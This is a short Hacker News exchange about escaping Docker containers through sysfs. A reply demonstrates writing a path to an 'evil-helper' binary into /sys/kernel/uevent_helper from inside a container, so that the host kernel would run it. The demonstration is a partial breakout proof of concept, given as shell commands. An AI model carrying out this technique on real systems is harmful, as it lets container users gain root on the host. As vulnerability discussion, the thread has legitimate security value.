Hacker News new | ask | show | jobs
by kalmi10 4270 days ago 

  kalmi@sylph ~> docker run -t -i busybox:latest
  / # mount -t sysfs sysfs /sys
  mount: permission denied (are you root?)
  / # mkdir sys2
  / # mount -t sysfs sysfs /sys2
  mount: mounting sysfs on /sys2 failed: Permission denied

  kalmi@sylph ~> docker --version
  Docker version 1.2.0, build fa7b24f

  kalmi@sylph ~> uname -r
  Linux sylph 3.13.0-35-generic #62-Ubuntu SMP Fri Aug 15 01:58:42 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
1 comments
stevekemp 4269 days ago
We don't need to argue about this, but I see the same permission-denied issue as you, but that doesn't matter.

The /sys is mounted already and reading/writing to it succeeds:

     / # mount -t sysfs sysfs /sys
     mount: permission denied (are you root?)

     / # echo /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a9706aef/tmp/evil-helper > /sys/kernel/uevent_helper

     / # cat   /sys/kernel/uevent_helper
     /var/lib/docker/aufs/mnt/638ae26bb710384a8ebade3a66049277affea8b0f3e96003d351f167a906aef/tmp/evil-helper
From there the attack works. Obviously the change here is that I need to know the full UID, which is a cheat, but ..
link